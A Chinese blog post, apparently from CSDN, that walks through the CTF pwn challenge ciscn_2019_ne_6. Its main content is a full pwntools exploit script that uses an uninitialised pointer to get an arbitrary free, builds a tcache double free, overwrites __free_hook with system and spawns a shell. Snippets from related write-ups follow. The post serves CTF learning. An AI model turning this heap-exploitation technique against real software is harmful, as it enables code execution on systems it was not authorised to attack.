ciscn_2019_ne_6(指针未初始化漏洞)

最新推荐文章于 2022-11-05 19:35:54 发布
最新推荐文章于 2022-11-05 19:35:54 发布
阅读量572 收藏
点赞数 1
分类专栏: 二进制漏洞 CTF pwn 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106686513
版权
二进制漏洞 同时被 3 个专栏收录
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
pwn
161 篇文章 24 订阅
订阅专栏

ciscn_2019_ne_6(指针未初始化漏洞)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,在delete功能里,ptr指针存在未初始化的漏洞,因此其ptr的值可以通过其他函数来控制,造成任意地址free。

我们可以利用check函数来控制ptr未初始化之前的值

然后构造double free,劫持free_hook即可。

#coding:utf8
from pwn import *

#sh = process('./ciscn_2019_ne_6')
sh = remote('node3.buuoj.cn',26888)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']

def show():
   sh.sendlineafter('>>','1')

def add(size,content):
   sh.sendlineafter('>>','2')
   sh.sendlineafter('passwd:','a')
   sh.sendlineafter('size:',str(size))
   sh.sendafter('Content:',content)

def edit(index,content):
   sh.sendlineafter('>>','3')
   sh.sendlineafter('passwd:','a')
   sh.sendafter('Content:',content)

def delete(index,passwd = 'a'):
   sh.sendlineafter('>>','4')
   sh.sendafter('passwd:',passwd.ljust(0x28,'\x00'))
   sh.sendlineafter('index:',str(index))

add(0x420,'a\n') #0
add(0x80,'a'*0x80) #1
add(0x80,'b'*0x80) #2

delete(0)
add(0x420,'\n') #0
show()
sh.recvuntil('0: ')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)
delete(2)
delete(1)
add(0x80,'\n') #1
show()
sh.recvuntil('1: ')
heap2_addr = u64(sh.recv(6).ljust(8,'\x00'))
print 'heap2_addr=',hex(heap2_addr)
#未初始化指针漏洞造成任意地址free,我们构造一个double free
delete(-1,'\x00'*0x20 + p64(heap2_addr))
add(0x80,p64(free_hook_addr) + '\n') #2
add(0x80,'/bin/sh\x00\n') #3
add(0x80,p64(system_addr) + '\n')
#getshell
delete(3)

sh.interactive()

 

ha1vk
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用全局chunk数组,free(负数)来实现tcache double free
tbsqigongzi的博客
10-17 147
ciscn_2019_ne_6
ciscn_2019_s_6
z1r0的博客
03-09 276
ciscn_2019_s_6 查看保护 漏洞出在了call里面有一个uaf漏洞。直接double free attack即可。 攻击思路:uaf又是libc2.27。所以直接申请0x410泄露出libc和free_hook。再通过double free修改fd为hook,改hook为one_gadget即可getshell。具体的2.27下的double free可以看z1r0’s blog from pwn import * context(arch='amd64', os='linux', log
buuctf ciscn_2019_ne_5
carol2358的博客
04-21 1086
ret2text 覆盖dest需要0x48+0x4,sh可以用gdb的find找到,别忘了写4个字符的返回地址 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_ne_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' ...
ciscn_2019_s_6(uaf)
m0_51251108的博客
11-16 357
ciscn_2019_s_6: 保护全开 漏洞分析: 指针清零,存在uaf 大致步骤: 利用unsortbin泄露libc,doublefree劫持free_hook为system exp: from pwn import * local_file = './ciscn_s_6' local_libc = './libc-2.27.so' remote_libc = './libc-2.27.so' select = 1 if select == 0: r = process(local_
110m_physical_地图_ne_110m_graticules_世界地图_physical_
09-28
6. ne_110m_ocean.cpg:海洋的栅格数据,标识出海洋边界和深度。 7. ne_110m_coastline.cpg:海岸线数据,定义了陆地与水体的边界。 综合以上信息,这个压缩包提供了一套完整的全球地理信息数据,包括经纬网格、...
UEFITool_NE_A51_win32.zip
12-24
6. **安全启动管理**:对于支持安全启动的系统,UEFITool可以帮助用户管理安全启动密钥,启用或禁用安全启动,以及添加自定义签名。 7. **备份与恢复**:UEFITool提供备份当前UEFI配置的功能,如果出现错误,可以...
ATOS.rar_ATOS NE_Atos
09-19
Atos NE是一个模块化设计的系统,支持nesC语言,这是一种C语言的扩展,专为TinyOS操作系统设计,用于编写低功耗、资源受限的物联网设备。nesC的特点在于其事件驱动的编程模型和组件化的结构,使得代码组织清晰,易于...
test_eth.rar_EMAC PHY_MC9S12NE64
09-24
这包括初始化EMAC模块,设置MAC地址,配置PHY芯片,建立与外部网络设备的连接,以及数据的发送和接收。通过这些测试,我们可以验证MC9S12NE64的网络功能是否正常工作,确保硬件设计和驱动程序的正确性。 在具体实现...
opengl.rar_OPENGL NE_nehe lesson_opengl nehe
09-23
1. Lesson1:基础设置 - 这一课通常介绍如何配置OpenGL环境,包括窗口的创建、OpenGL上下文的初始化以及基本的渲染循环。 2. Lesson2:颜色和绘制多边形 - 学习者会了解到如何使用OpenGL绘制简单的几何形状,如...
NetLogo-6.1.0-64.tgz
07-25
NetLogo-6.1.0版本64位Linux版,是为最新版本,可用于linux操作系统。
初始化UAF漏洞
04-26
释放重引用(UAF)或者初始化漏洞题目,
Newifi Y1S Breed
09-28
Newifi Y1S路由器如果需要刷潘多拉固件,首先需要刷Breed。
c++ 导入stack 头文件 stack申明_linux内核提权系列教程(3):栈变量初始化漏洞...
weixin_35530964的博客
12-23 275
一、 漏洞分析1. 程序分析总共两个驱动号,对应两个功能。case UNINITIALISED_STACK_ALLOC:{ ret = copy_to_stack((char*)p_arg);break;}case UNINITIALISED_STACK_USE:{ use_obj_args use_obj_arg;...
[buuctf]ciscn_2019_ne_5
最新发布
逆向萌新的博客
11-05 1621
buuctf ciscn_2019_ne_5题目分析
BUUCTF ciscn_2019_ne_5
doudoudedi
01-06 786
这道题是一道典型的ROP一开始没找到参数~~ 直接溢出emem exp(其实我写的很麻烦了很简单的) #!/usr/bin/python2 from pwn import * local=1 if local==1: p=process('../binary/ciscn_2019_ne_5') elf=ELF('../binary/ciscn_2019_ne_5') libc=elf.lib...
ciscn2019部分writeup
Sea_Sand息禅
06-06 1291
Web 1、JustSoso 拿到源码 打开靶机,查看源码得到提示: 一看就是文件读取,然后就文件读取走一波。 file=php://filter/read=convert.base64-encode/resource=hint.php base64解码拿到hint.php的源码: <?php class Handle{ private $handle; ...
ciscn_2019_n_4
doudoudedi
02-03 1964
堆块上有悬挂的指针直接对它进行写入即可 exp: #!/usr/bin/python2 from pwn import * #p=process('./ciscn_2019_n_4') p=remote('node3.buuoj.cn',25967) elf=ELF('./ciscn_2019_n_4') libc=elf.libc def add(size,content): p.sen...
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 525
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值